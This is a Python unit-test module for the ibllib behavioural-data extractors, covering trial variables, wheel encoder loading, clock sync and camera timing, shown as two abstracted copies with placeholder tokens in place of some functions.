raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n 